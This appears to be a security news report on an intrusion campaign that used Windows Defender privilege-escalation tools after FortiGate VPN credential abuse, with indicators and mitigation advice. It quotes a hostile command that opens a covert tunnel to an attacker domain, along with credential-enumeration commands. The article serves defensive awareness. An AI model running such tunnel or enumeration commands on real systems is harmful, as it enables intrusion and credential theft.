Hackers Exploit FortiGate SSL VPN with Nightmare-Eclipse Tools

A real-world intrusion campaign has been observed leveraging publicly available Nightmare-Eclipse privilege escalation tools—BlueHammer, RedSun, and UnDefend—after what appears to be unauthorized access through a compromised FortiGate SSL VPN.

The incident marks the first confirmed in-the-wild deployment of these tools against a live enterprise environment, raising urgent alarms for security teams globally.

The tools at the center of this incident were developed by a security researcher known as Chaotic Eclipse, also referred to as Nightmare-Eclipse, a pseudonymous figure who grew frustrated with Microsoft’s vulnerability disclosure process and publicly released a series of local privilege escalation (LPE) exploits in retaliation.

The trio of tools BlueHammer, RedSun, and UnDefend exploits logic flaws in Windows Defender’s privileged operations to escalate an attacker from an unprivileged user account to SYSTEM-level access, or to disrupt Defender’s security functions entirely without requiring administrative rights.

Microsoft addressed BlueHammer in its April 2026 Patch Tuesday update, tracking it as CVE-2026-33825. However, as of publication, RedSun and UnDefend remain unpatched zero-days actively usable against fully updated Windows systems.

Nightmare-Eclipse Tools Using FortiGate SSL VPN Access

Huntress first detected suspected in-the-wild use of BlueHammer on April 10, 2026, when a binary named FunnyApp.exe — a build pulled directly from the public BlueHammer GitHub repository was executed from a victim user’s Pictures folder and subsequently quarantined by Defender as Exploit:Win32/DfndrPEBluHmr.BZ.

Activity escalated on April 16, with investigators observing RedSun.exe an execution from the user’s Downloads directory, alongside multiple executions of undef.exe the UnDefend binary from short two-letter subfolders such as ks and kk.

In a telling sign of operator inexperience, the threat actor invoked UnDefend with an -agressive flag (misspelled) and a -h help flag that does nothing in the tool, demonstrating they had not fully read or understood the tooling.

Critically, none of the privilege escalation attempts succeeded: BlueHammer did not extract SAM credentials, RedSun did not overwrite TieringEngineService.exe in System32, and UnDefend was terminated by Huntress’ SOC during active remediation.

Customer-provided VPN logs revealed a critical piece of the puzzle. On April 15, 2026, at 13:44 UTC, an attacker initiated an SSL VPN connection to the victim’s FortiGate firewall using valid user credentials from IP 78.29.48[.]29, geolocated to Russia.

Subsequent unauthorized sessions tied to the same account were observed from 212.232.23[.]69 (Singapore) and 179.43.140[.]214 (Switzerland) a multi-geography access pattern consistent with credential abuse and possible credential resale or sharing.

The most operationally dangerous component Huntress identified was a Go-compiled Windows binary dubbed BeigeBurrow, executing as agent.exe -server staybud.dpdns[.]org:443 -hide.

The tool uses HashiCorp’s Yamux multiplexing library to establish a persistent, covert TCP relay between the compromised host and attacker-controlled infrastructure over port 443, a port rarely blocked by enterprise firewalls.

Unlike the privilege escalation tools, BeigeBurrow successfully connected outbound and is the only component in the observed toolkit that achieved its intended purpose. Huntress noted it has observed BeigeBurrow in at least one other unrelated intrusion, though attribution remains unclear.

Beyond tool execution, Huntress confirmed the presence of a live, hands-on-keyboard threat actor through post-exploitation enumeration commands, including whoami /priv, cmdkey /list, and net group.

Notably, whoami /priv was spawned directly from an M365Copilot.exe process, an anomaly that investigators could not fully explain but noted occurred after the initial compromise and following BlueHammer’s first execution attempt.

Indicators of Compromise (IoCs)

Mitigation Guidance

Organizations should treat any confirmed execution of these binaries as high-priority incident activity. Huntress recommends the following immediate actions:

• Patch immediately: Apply Microsoft’s April 2026 Patch Tuesday update to remediate CVE-2026-33825 (BlueHammer).
• Hunt for staging artifacts: Investigate user-writable paths such as Pictures and short subfolders under Downloads for binaries like FunnyApp.exe, RedSun.exe, undef.exe, and z.exe.
• Review VPN authentication logs: Flag any account authenticating from multiple countries within a short timeframe.
• Block and monitor tunneling behavior: Investigate any execution of agent.exe with -server and -hide flags, and block the domain staybud.dpdns[.]org.
• Detect post-exploitation enumeration: Alert on whoami /priv, cmdkey /list, and net group spawned from unusual parent processes.

A YARA detection rule for BeigeBurrow has been published publicly to aid community-wide detection efforts.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.